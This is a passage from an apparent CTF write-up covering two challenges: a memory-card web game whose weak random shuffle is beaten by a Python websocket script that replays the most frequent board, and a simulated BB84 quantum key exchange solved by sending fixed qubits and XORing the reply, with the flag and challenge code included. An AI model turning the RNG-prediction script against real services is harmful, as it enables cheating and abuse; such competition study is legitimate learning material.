  2. The cards start out in an ordered manner [1, 1, 2, 2, 3, 3 … 28, 28] and are then shuffled using the following algorithm: for i := BoardSize – 1; i > 0; i– {
    j := rand.UInt64n(uint64(i) + 1)
    b.nums[i], b.nums[j] = b.nums[j], b.nums[i]
    }

Starting from the last card – each card is swapped with any of its predecessors. Choosing the card relied on the randomness. A new (weak) seed is created for each game. The Uint64n function uses the Uint64 function to give us a number in the range of 0..n | 8 bytes of cell id))

We looked at the two functions Uint64n and Uint64 – they seem just as bad as OsRand.

With all the problems in the random generation we decided to try and “read” a lot of boards from the server and perform a histogram on them, assuming we would detect collisions pretty quickly.

We wrote a small python script to talk to the server via websockets and started our test.
Indeed we saw that our assumption was true – we saw the first board twice after about 2000 tries.
At this point we tried to write some fancy code that put each board into a hash table by opening the first 4 cells and using it as key adding boards as we go. We are not exactly sure why but this code didn’t solve it so after an hour or so we decided to write something simpler. We went through all the boards we collected and found the one that appeared the most. We updated our script to solve the game using it as the correct solution – figuring that if the random is as broken as we saw – we should get that table and succeed on it.
This simple approach worked 🙂

Our solution:

import asyncio
import websockets
from threading import Thread
from json import dumps, loads, load
from time import sleep
from collections import defaultdict

boards = []
hist = defaultdict(int)
board_count = 0
duplicates = 0

board_dict = defaultdict(list)


my_board = [20, 11, 23, 22, 14, 4, 9, 17, 20, 23, 19, 16, 1, 27, 6, 3, 26, 3, 4, 2, 18, 5, 22, 18, 11, 16, 8, 13, 27, 9, 24, 12, 0, 24, 25, 21, 5, 7, 19, 2, 15, 15, 21, 25, 1, 17, 10, 12, 0, 13, 8, 6, 10, 26, 14, 7]

def get_pairs_from_board(board):
    pairs = []
    for i in range(len(board)//2): 
        p = [] 
        p.append(board.index(i))
        p.append(board.index(i, p[0]+1))
        pairs.append(p)
    return pairs


async def solve_by_board(ws, board):
    pairs_list = get_pairs_from_board(board)
    for pair in pairs_list:
        for i in pair:
            y = i // 7
            x = i % 7
            await ws.send(dumps({"op":"guess","body":{"x":x,"y":y}}))
            res = loads(await ws.recv())

    if res['message']:
        print('\n\n\nWOW !!!!!!!!!!\n\n\n', res['message'])

async def hello():
    global board_count
    global duplicates
    matched_pairs = []
    try:
        async with websockets.connect(
                'wss://doomed.web.ctfcompetition.com/ws', 
                ssl=True,
                extra_headers={
                    "Origin": "https://doomed.web.ctfcompetition.com",
                    "Host": "doomed.web.ctfcompetition.com"
                }) as ws:
            board = [-1] * 8 * 7
            await ws.send(dumps({"op":"info"}))
            await ws.recv() # board info
            reqs = 0


            return await solve_by_board(ws, my_board)
    except websockets.exceptions.ConnectionClosed as e:
        print("skipped error...", e)


while True:    
    for i in range(100):
        total += 100
        if (total % 1000 == 0):
            print('total: %d\r' % total, end='')
        future = asyncio.ensure_future(hello())
    asyncio.get_event_loop().run_until_complete(future)

Quantum Key Distribution

The challenge is described as follows:

Generate a key using Quantum Key Distribution (QKD) algorithm and decrypt the flag.

We’re given an encrypted flag

U2FsdGVkX19OI2T2J9zJbjMrmI0YSTS+zJ7fnxu1YcGftgkeyVMMwa+NNMG6fGgjROM/hUvvUxUGhctU8fqH4titwti7HbwNMxFxfIR+lR4=

We’re told that the encryption key is being shared
by a simulated Quantum satellite implementing BB84.
We’re given a URL to which we can POST our “qubits and basis of measurement”
(we’re told we need to provide 512 qubits),
and then we can “derive the shared key” from the decoded response.
We’re also given the Python source code of the server.
Finally, we’re given an example of how to decrypt a message
given a shared key.
(See Appendix A for the full text of the challenge).

Analysis

The main difficulty in this challenge
is simply understanding the BB84 protocol
and the mapping between it and the pieces of information we were given.

BB84

Googling for “BB84 quantum” turns up a number of useful sources.
The one that we ultimately found most accessible was
Mart Haitjema’s Survey of the Prominent Quantum Key Distribution Protocols.

Very basically,
the idea is that Alice and Bob have two channels of communication between them:
one classical, and one quantum.
The classical channel is assumed to be public[^1].
The quantum channel is also assumed to be potentially public;
however, the protocol’s guarantee is that given the channel’s quantum nature,
Bob and Alice will be able to detect
if anyone has actually been eavesdropping on a given transmission.
Thus, after having communicated
a random string of bits
over this channel,
they can know whether it has been eavesdropped on.
Given a transmission which has not been seen by any other party,
they now have established a certain amount of shared bits
which are known only to them,
and which can now serve as a one-time pad
for encrypting the actual information they want to share,
allowing it to be shared
over the public, classical channel.

[^1]: To be precise,
we assume the public channel is subject to passive eavesdropping,
but not to active manipulation:
BB84 does not on its own defend against a MITM attacker.
The original paper briefly discusses this issue,
we will not go into it here.

How does transmission over the quantum channel work?
Each bit of information is encoded as a “qubit” (quantum bit)
which takes the form of a photon with a given polarization.
We define two “bases”
(see figure 1, taken from Haitjema’s survey):
the rectilinear basis, in which 0 is encoded by a polarization of 0 degrees and 1 is encoded by polarization 90;
and the diagonal basis, in which 0 is encoded by a polarization of 45 degrees and 1 by polarization of 135.

Figure 1: encoding a bit in a qubit

This is where quantum physics comes in to the story:
(quoting the original BB84 paper (PDF)🙂
“Although polarization is a continuous variable,
the uncertainty principle forbids measurements on any single photon
from revealing more than one bit about its polarization”.
Rather, measurements made using the diagonal basis
will only ever result in an observation of either 45 or 135 degree polarization.
Similarly, measurements made using the rectilinear basis
will only ever result in an observation of either 0 or 90 degree polarization.
The closer the actual polarization is to either of the measurement’s possible outcomes,
the higher the probability that that outcome will be observed.
So, if we measure a photon with polarization 45 using the diagonal basis,
there is a very high probability of actually observing 45 degrees,
thus allowing reliable transmission of the encoded 0 bit.
However, if we measure the same photon using the rectilinear basis,
we have equal chances of observing polarization of 0 or 90,
and thus the value of the decoded bit is essentially random.
Moreover, we will not even have gained any information
that would allow us to know
that we made the measurement using an incorrect basis.

With this knowledge, we can finally understand the details of the BB84 protocol:
In the first phase,
Alice chooses a random string of bits to be transmitted,
and for each bit also randomly chooses which basis to use for encoding it.
The resulting stream of photons makes up her transmission over the quantum channel.
At the receiving end,
Bob randomly chooses a basis for measuring each photon.
As we’ve seen,
wherever he chose the correct basis,
he will, with very high probability, decode the correct value for the bit.
Wherever he chose the incorrect basis,
he will get a random value for the bit.

In the second phase,
Bob and Alice share with each other
— over the insecure, classical channel —
their choices of basis for each bit.
They can now discard any bits at which their choice of basis disagreed.
For the remaining bits, though,
their observed values should agree,
and if so, they have established a secret of shared random bits.

Let’s consider for a moment what would happen
if Eve were eavesdropping on the quantum transmission:
During the transmission of the photons themselves
the correct basis is still known only to Alice
(it is only after Bob has made his measurements
that the choices of bases will be publicly shared).
Thus, Eve cannot know which basis to choose
for measuring any given photon.
This is the same position that Bob is in,
except that Eve is then retransmitting new photons
(encoding the values she has observed)
for Bob to receive, and upon receiving them
Bob goes through the same process again.
So, while in the absence of an eavesdropper,
Alice and Bob expect the values of their bits to match
for all of the bits for which they have chosen the same basis,
in the presence of an eavesdropper this will be much less:
for every bit for which Alice and Bob’s basis choice matched,
but Eve’s differed,
there is only a 50% chance of Alice and Bob’s values agreeing.

Thus, the final phase of the protocol
is for Alice and Bob to compare
a randomly chosen subset
of the “presumed shared” bit values:
if the actual rate of agreement is less than expected,
this indicates the presence of an eavesdropper.
Of course, the bits whose values are compared
(over the classical, public channel)
can no longer be used as key material
(they are no longer secret!),
but that merely requires adjusting the number of transmitted bits
such that enough key material will remain
after the comparison.
Moreover, the number of bits compared can be adjusted
to reach any desired level of confidence
in the secrecy of the transmission.

Mapping the protocol to the challenge

Now that we understand the BB84 protocol,
let’s see how the information we’re given in the challenge
maps to the protocol.

In the challenge,
an exchange is triggered by a POST performed by us.
The POST must include
(as described in How to send qubits)
a list of “qubits”
(each represented by the real and imaginary parts of a complex number)
and a “basis”
(represented by a list of ‘+’ or ‘x’ symbols,
‘+’ signifying the rectilinear basis, and ‘x’ — the diagonal basis).

We, being the initiators of the transmission, are Alice.
The list of qubits we send represents the stream of photons
encoding the random bits we have chosen.
Here, it helps to have prior familiarity
(from Math, Physics or Electrical Engineering studies, for example)
with the fact that complex numbers are often used to represent points on a circle
— in our case, the polarity of a photon —
with the real and imaginary parts representing the X and Y components, respectively.
The ‘basis’ list represents our choices of basis for encoding each of the bits.
(In sending both of these lists together
we have departed somewhat from the true protocol
— as we’ve seen, a vital part of the protocol
is that the sharing of the choice of basis
only be done after the receiving side has performed the measurements!
But hey, this is only a simulation…)

Bob — the server — receives our stream of photons,
and measures each one’s polarization using a randomly chosen basis:

def measure(rx_qubits, basis):
  measured_bits = ""
  for q, b in zip(rx_qubits, basis):
    if b == 'x':
      q = rotate_45(q)
    probability_zero = round(pow(q.real, 2), 1)
    probability_one = round(pow(q.imag, 2), 1)
    measured_bits += str(numpy.random.choice(numpy.arange(0, 2), p=[probability_zero, probability_one]))
  return measured_bits
.
.
.
sat_basis = [random.choice('+x')...
measured_bits = measure(unmarshal(rx_qubits), sat_basis)

Note that the basis passed into measure() is the satellite’s basis, not ours
(so indeed, our basis does not play a part in the first phase);
that the result of the measurement is always only a single bit 0 or 1,
with the actual polarization only determining the probability for each of those values.
At the end of this process,
Bob has a single bit (measured_bits) — the result of a measurement —
for each of the photons we sent.
This concludes the first phase of the protocol.

In the second phase Alice and Bob compare their bases to derive shared bits.
We’ve already sent our basis choices,
and only now does Bob make use of it,
precisely by keeping (in ret) only those bits for which
his choice of basis and our choice match:

def compare_bases_and_generate_key(tx_bases, rx_bases, measure):
  """Compares TX and RX bases and return the selected bits."""
  if not (len(tx_bases) == len(rx_bases) == len(measure)):
    return None, "tx_bases(%d), rx_bases(%d) and measure(%d) must have the same length." % (len(tx_bases), len(rx_bases), len(measure))
  ret = ''
  for bit, tx_base, rx_base in zip(measure, tx_bases, rx_bases):
    if tx_base == rx_base:
      ret += bit
  return ret, None
.
.
.
  binary_key, err = compare_bases_and_generate_key(rx_basis, sat_basis, measured_bits)

Bob now has the resulting binary_key
(the shared bits, upon whose values we and he should agree).
But we don’t have the shared bits yet!

For that, we need to inspect the server’s response to our POST.
A sample response looks like so:

{"basis": ["+", "+", "x", "x", "+", "x", "+", "x", "x", "+", "x", "x", "x",
"+", "x", "+", "+", "x", "+", "x", "x", "x", "+", "+", "x", "+", "+", "x", "+",
. . .
"x", "+", "x", "+", "x", "+", "+", "+", "+", "+", "+", "x", "+", "+", "x", "+",
"x", "x", "+"], "announcement": "d748fe4acbb99b1c68f9d534371f80b7"}

We see that Bob has sent us his choice of basis.
By comparing it with our basis choices
we, too, can determine which bits of our transmission
to keep as the shared bits.
Now that both sides have the shared bits,
the second phase is complete.

The challenge doesn’t appear to have any analog for the third phase:
the code we’re given simply returns all of the matching bits as the shared key.
Again, this is only a simulation,
in which we don’t seem to be especially concerned
about detecting eavesdropping…

We are not given the code
showing what exactly the server does with the shared key.
However, there is one more piece of information in the response
that we haven’t yet used: the “announcement”.
It took us a while to realize
(more on that in the next section)
that this is actually the encrypted “flag key”,
itself encrypted using the one-time pad resulting from our shared bits.
Thus, simply xor’ing our shared bits with the announcement
results in a key,
which can then be used for decrypting the flag
using the procedure demonstrated in the example.

How we actually solved the challenge

We will not pretend that,
during the CTF itself,
we understood BB84
— or its correspondence to the challenge —
anywhere near as clearly as presented above.

Yes, we started out by reading up on the protocol,
and had a very basic understanding of the concepts involved.
But that’s about it.
For one thing,
we couldn’t even agree as to whether we were Alice or Bob!
Nor were we sure which parts of the communications in the challenge
represented the quantum channel,
and which represented the classical channel.
Indeed, we weren’t even sure
exactly which parts of the protocol
are transmitted over each of the channels!

So, this is where the hacker mindset kicks in:
We’re given a url to which we can POST,
and a description of what to POST,
so let’s just POST, and see what happens!
From there, the process was basically one of
jumping back and forth between the “theory” and the “practice”,
continually trying to narrow the gap (in our understanding) between them,
and figuring out how exactly they fit together.

Our first few attempts at POSTing a request weren’t too successful.
Being lazy, we figured that,
rather than actually start by choosing random qubits and basis,
we’d start with hardcoded values, like so:

import requests

basis = ['+'] * 512
qubits = [{'real':1, 'imag':1} for _ in range(512)]

data = {'basis':basis, 'qubits':qubits}

r = requests.post('https://cryptoqkd.web.ctfcompetition.com/qkd/qubits', json=data)
print(r.status_code)
r = r.content
print(r)

The response we got to this request was:

probabilities do not sum to 1

Hopefully,
after reading the previous sections
the problem is immediately evident.
At the time, however, it took as a while to realize
our mistake:
the point we were giving as the value of the qubit
had 1 as both the real and imaginary parts,
which means that the sum of probabilities is, indeed, greater than 1.
So we tried {'real':1, 'imag':0}, and now we got the response

your random key is not random enough!

Again, in retrospect,
it’s easy to see that
by having chosen the rectilinear basis and a value of 1+0i
( = 0 degrees — the number is entirely in the X component)
we were encoding a value of 0 for every bit,
and the server must be rejecting a key with too many zeros.
At the time, though,
everything still being pretty fuzzy in our minds,
we figured that perhaps the server didn’t like the fact
that the qubit values were “not complex enough”
(i.e., all in the real component)
and so we decided to give a mixed (but still hardcoded) value for all qubits,
only making sure this time that the sum of probabilities remained 1:

{'real':1/math.sqrt(2),'imag':1/math.sqrt(2)}

Aha! This finally gave a non-error response,
similar to the one shown previously,
containing basis and announcement.
For every request,
we get back a different, seemingly random,
basis and announcement.

We were not sure at this point how to interpret our results.
Were we supposed to collect many responses,
extracting some information from each,
until we could build up enough shared key material?
Or were we doing something wrong?

So again, back to the theory, trying to better understand what we had done.
Until we finally realized that
by sending polarization of 45 degrees
together with a rectilinear basis,
we had been sending the server a stream of photons
which it could only measure as random,
resulting in a random response!

Now we understood that with the rectilinear basis,
we need to be sending polarization of either 0 or 90 degrees.
So, if 0 degrees was “not random enough” for the server,
let’s try all 90 degrees!
(Again, laziness, to not have to start dealing with random choices…)
So we sent a request with hardcoded qubits all of 90 degrees,
and finally we started getting consistent results!
The returned basis was still changing randomly (as expected),
but the announcement was now constant:
6b9300936261012ffddcc59593847c4e.

Getting a constant value seemed like a step in the right direction,
however we still were not sure how to interpret it.
We tried using the returned value as the key for decrypting the flag,
but got nowhere.
After analyzing the situation,
we realized that the “shared bits” we were expecting should be all 1’s
(that’s what is encoded by 90 degrees in rectilinear).
We even ran the server code ourselves,
and confirmed that in fact the binary_key it was returning
was indeed all 1’s, given our input.
So where was the constant-but-not-all-1’s response
we were getting from the server
coming from?
Only after some more thinking did we finally realize
that the announcement must be
not the shared bits themselves,
but rather some further processing done by the server,
using those shared bits.
Such as… using the shared bits as a one-time pad
for encrypting the flag key…
So we xor’ed the announcement with our expected shared bits (all 1’s)
and tried using the result for decrypting the flag —
which resulted in

CTF{you_performed_a_quantum_key_exchange_with_a_satellite}.

Indeed…

Appendix A

What follows is a verbatim copy of the text provided at the time of the challenge.
The text was hosted at https://cryptoqkd.web.ctfcompetition.com/qkd/,
this is the base for the relative urls appearing in the text:

Challenge

We are simulating a Quantum satellite that can exchange keys using qubits implementing BB84.
You must POST the qubits and basis of measurement to /qkd/qubits and decode our satellite response,
you can then derive the shared key and decrypt the flag.
Send 512 qubits and basis to generate enough key bits.

This is the server’s code:

import random
import numpy

from math import sqrt
from flask import current_app

def rotate_45(qubit):
  return qubit * complex(0.707, -0.707)

def measure(rx_qubits, basis):
  measured_bits = ""
  for q, b in zip(rx_qubits, basis):
    if b == 'x':
      q = rotate_45(q)
    probability_zero = round(pow(q.real, 2), 1)
    probability_one = round(pow(q.imag, 2), 1)
    measured_bits += str(numpy.random.choice(numpy.arange(0, 2), p=[probability_zero, probability_one]))
  return measured_bits

def compare_bases_and_generate_key(tx_bases, rx_bases, measure):
  """Compares TX and RX bases and return the selected bits."""
  if not (len(tx_bases) == len(rx_bases) == len(measure)):
    return None, "tx_bases(%d), rx_bases(%d) and measure(%d) must have the same length." % (len(tx_bases), len(rx_bases), len(measure))
  ret = ''
  for bit, tx_base, rx_base in zip(measure, tx_bases, rx_bases):
    if tx_base == rx_base:
      ret += bit
  return ret, None

def unmarshal(qubits):
  return [complex(q['real'], q['imag']) for q in qubits]

# Receive user's qubits and basis, return the derived key and our basis.
def perform(rx_qubits, rx_basis):
  random.seed()
  # Multiply the amount of bits in the encryption key by 4 to obtain the amount of basis.
  sat_basis = [random.choice('+x') for _ in range(len(current_app.config['ENCRYPTION_KEY'])*16)]
  measured_bits = measure(unmarshal(rx_qubits), sat_basis)
  binary_key, err = compare_bases_and_generate_key(rx_basis, sat_basis, measured_bits)
  if err:
    return None, None, err
  # ENCRYPTION_KEY is in hex, so multiply by 4 to get the bit length.
  binary_key = binary_key[:len(current_app.config['ENCRYPTION_KEY'])*4]
  if len(binary_key) < (len(current_app.config['ENCRYPTION_KEY'])*4):
    return None, sat_basis, "not enough bits to create shared key: %d want: %d" % (len(binary_key), len(current_app.config['ENCRYPTION_KEY']))
  return binary_key, sat_basis, None

How to send qubits

POST your qubits in JSON format the following way:

  • basis: List of ‘+’ and ‘x’ which represents the axis of measurement. Each basis measures one qubit:
    • +: Normal axis of measurement.
    • x: π/4 rotated axis of measurement.
  • qubits: List of qubits represented by a dict containing the following keys:
    • real: The real part of the complex number (int or float).
    • imag: The imaginary part of the complex number (int or float).

The satellite responds:

  • basis: List of ‘+’ and ‘x’ used by the satellite.
  • announcement: Shared key (in hex), the encryption key is encoded within this key.

Example decryption with hex key 404c368bf890dd10abc3f4209437fcbb:

echo "404c368bf890dd10abc3f4209437fcbb" > /tmp/plain.key; xxd -r -p /tmp/plain.key > /tmp/enc.key

echo "U2FsdGVkX182ynnLNxv9RdNdB44BtwkjHJpTcsWU+NFj2RfQIOpHKYk1RX5i+jKO" | openssl enc -d -aes-256-cbc -pbkdf2 -md sha1 -base64 --pass file:/tmp/enc.key

Flag (base64)

U2FsdGVkX19OI2T2J9zJbjMrmI0YSTS+zJ7fnxu1YcGftgkeyVMMwa+NNMG6fGgjROM/hUvvUxUGhctU8fqH4titwti7HbwNMxFxfIR+lR4=